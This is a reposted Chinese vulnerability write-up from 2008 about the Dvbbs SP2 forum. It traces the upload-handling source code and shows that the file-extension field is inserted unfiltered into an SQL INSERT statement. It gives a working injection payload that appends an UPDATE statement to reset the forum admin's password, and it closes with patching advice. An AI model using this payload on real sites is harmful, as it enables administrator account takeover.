分享
 
 
 

dvsp2上传漏洞再现----击溃动网sp2的神话

王朝other·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

前段时间听说动网的上传再次出现了不可修复的错误,有人居然说是upload.inc有错,我仔细的读了N遍代码,可以肯定的说,upload.inc应该没有办法利用,今天无意中跑到动网的官方网站上去仔细的看了一下,个人资料修改里有上传,但是发帖里却没有上传,upload.asp和post_upload.asp同样用到了upload.inc,证明这个文件绝对没有问题,那问题一定出在post_upfile.asp上了,打开这个文件再次通读一遍!

一看

If upload_ViewType<>999 and F_Type=1 then

Dvbbs.execute("insert into dv_upFile (F_BoardID,F_UserID,F_Username,F_Filename,F_Viewname,F_FileType,F_Type,F_FileSize,F_Flag) values ("&Dvbbs.BoardID&","&Dvbbs.UserID&",'"&Dvbbs.membername&"','"&replace(rename,"|","")&"','"&F_Viewname&"','"&replace(FileExt,".","")&"',"&F_Type&","&Filesize&",4)")

Else

Dvbbs.execute("insert into dv_upFile (F_BoardID,F_UserID,F_Username,F_Filename,F_FileType,F_Type,F_FileSize,F_Flag) values ("&Dvbbs.BoardID&","&Dvbbs.UserID&",'"&Dvbbs.membername&"','"&replace(rename,"|","")&"','"&replace(FileExt,".","")&"',"&F_Type&","&Filesize&",4)")

有sql语句,难道传说中的上传再次利用是注入而不是上传,那我们就把他提交的变量每一个来通读一下

Dvbbs.BoardID,Dvbbs.UserID,Dvbbs.membername,F_Viewname,F_Type,Filesize这几个是肯定没有问题的,其它的几个我们就来看一下,这几个变量从哪来的,怎么得到的!

先说第一个replace(rename,"|","")把rename里的"|"这个符号去掉,我们看看rename的变量怎么来的,rename=createPath&Filename&"|"

是用createpath和filename连接起来再加上"|"生成的,"|"符号在后面被过滤了,可以不用考滤,再分别看看creatpath和filename

File_name = createName()

Filename = File_name&"."&FileExt(由file_name和fileExt联合起来的)

Private Function createName()

Dim ranNum

Randomize

ranNum=int(999*rnd)

createName=year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum

End Function

很明显,file_name是按年月日加随机数生成的,没有办法利用,疑点就在fileExt了。。。。。

难道,传说中的就要出现了,先不慌,我们先看看其它的地方

而creatpath又是这样来的

Private Function createPath()

Dim objFSO,Fsofolder,uploadpath

uploadpath=year(now)&"-"&month(now) '以年月创建上传文件夹,格式:2003-8

On Error Resume Next

Set objFSO = Server.createObject("Scripting.FileSystemObject")

If objFSO.FolderExists(Server.MapPath(CheckFolder&uploadpath))=False Then

objFSO.createFolder Server.MapPath(CheckFolder&uploadpath)

End If

If Err.Number = 0 Then

createPath=uploadpath&"/"

Else

createPath=""

End If

Set objFSO = Nothing

End Function

creatpath又是用uploadpath加上fso按年月生成的,例如uploadfile/2004-11之类的,这样,又不能利用

好,这里发现一个疑点了

我们再看另一个变量replace(FileExt,".",""),直接就是前面提到的有疑点的那个fileExt了,呵呵,看准了,就是他了。我们把他的来龙去脉全找出来,看看能不能利用

Set File=upload.File(FormName) ''生成一个文件对象

FileExt=FixName(File.FileExt)

在这里,他开始出现了

file.fileExt这个不是我们提交的扩展名吗,玩过动网上传的都知道,抓个包,改个扩展名这是蛮正常的事,看来有门了,至少我们这个地方可以利用,====,FileExt=FixName(File.FileExt)他还用fixname来过滤了的,我们看看这个函数有什么用

Function FixName(UpFileExt)

If IsEmpty(UpFileExt) Then Exit Function

FixName = Lcase(UpFileExt)

FixName = Replace(FixName,Chr(0),"")

FixName = Replace(FixName,".","")

哈哈,把.替换成空了,为什么动网sp2的上传利用不了,就在这里的原因

FixName = Replace(FixName,"asp","")把asp替换成空

FixName = Replace(FixName,"asa","")

asa过滤

FixName = Replace(FixName,"aspx","")

aspx过滤

FixName = Replace(FixName,"cer","") cer过滤

FixName = Replace(FixName,"cdx","")

cdx过滤

FixName = Replace(FixName,"htr","") htr过滤

End Function

哈哈,全部只是过滤了一些特殊的地方,但是我们如果拿来注入用到的引号,分号,逗号,--,一个都没有过滤,也就是说是通行无阻了,嘎嘎,接下来就是用到构造语句了,我们再来看他的sql语句

insert into dv_upFile (F_BoardID,F_UserID,F_Username,F_Filename,F_Viewname,F_FileType,F_Type,F_FileSize,F_Flag) values ("&Dvbbs.BoardID&","&Dvbbs.UserID&",'"&Dvbbs.membername&"','"&replace(rename,"|","")&"','"&F_Viewname&"','"&replace(FileExt,".","")&"',"&F_Type&","&Filesize&",4)

在values后面

"&Dvbbs.BoardID&","&Dvbbs.UserID&",'"&Dvbbs.membername&"

这些全部是正常的,我们改了fleExt后,rename也跟着变化了,所以实际上后面的&replace(FileExt,".","")&这里我们就可以不管了,只要构造前面的rename,再看看reanme是如何来的

rename=createPath&Filename&"|"

File_name = createName()

Filename = File_name&"."&FileExt

createpath是正常的一串值,可以不计,file_name也是正常的值可以不计,中间有一个.可以不计,后面的"|"他帮我们自己过滤了,可以不计.我们假设他的语句为

insert into dv_upFile (F_BoardID,F_UserID,F_Username,F_Filename,F_Viewname,F_FileType,F_Type,F_FileSize,F_Flag) values ("1","1",'"user"','uploadfile/2004-11/2324128374912.jpg','user','jpg',"1","1000",4)

这是一条正常的语句,我们能利用的地方就是jpg,这个地方是我们包里可以传送过去的,是本地的文件扩展名,那我们就把jpg构造成具体的完整的sql语句。

比如jpg替换成

jpg','user','jpg',"1","1000",4);update dv_admin set userpasswrod='123' where username='admin'--jpg

(说一句,他的f_type是用来检测文件类型的,如果是1,也就是图片就执行的前一条sql语句,如果是其它就执行的后一条语句,具体的代码在这里

F_Type = CheckFiletype(FileExt)

checkfiletype函数的代码又是这样的

Private Function CheckFiletype(FileExt)

Dim upFiletype

Dim FilePic,FileVedio,FileSoft,FileFlash,FileMusic

FileExt=Lcase(Replace(FileExt,".",""))

select Case Lcase(FileExt)

Case "gif", "jpg", "jpeg","png","bmp","tif","iff"

CheckFiletype=1

Case "swf", "swi"

CheckFiletype=2

Case "mid", "wav", "mp3","rmi","cda"

CheckFiletype=3

Case "avi", "mpg", "mpeg","ra","ram","wov","asf"

CheckFiletype=4

Case Else

CheckFiletype=0

End select

End Function

这里也用到了fileExt这个变量,也就是我们的扩展名

去掉所有的".",然后再去取后的扩展名,所以我们的语句最后结束时要用考滤到这个,因为第一语句和第二语句构造方法不一样的!)

嘎嘎,dv_admin里的admin的userpassword就被改为123了.

如果是access版的好像有点难度,分号是不能多语执行的,又不是where条件,不能拿来猜测,而且values的值好像不能用select 来把其它的值填入,只有把整个select 的值拿来返回做为记录加入,没办法在values里单独取值,有没有人能有办法构造出这个完美的语法来,教教偶,偶sql水平不是蛮高,access版的暂时还没有想到完整的办法。

文章至些结束了,最重要的要说的就是所有的放入到sql语句里的参数都要严格检测,这个地方的补丁一个是在fixname()函数里过滤,如果不会的暂时就先关掉发帖上传的功能吧,等补丁!:)

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有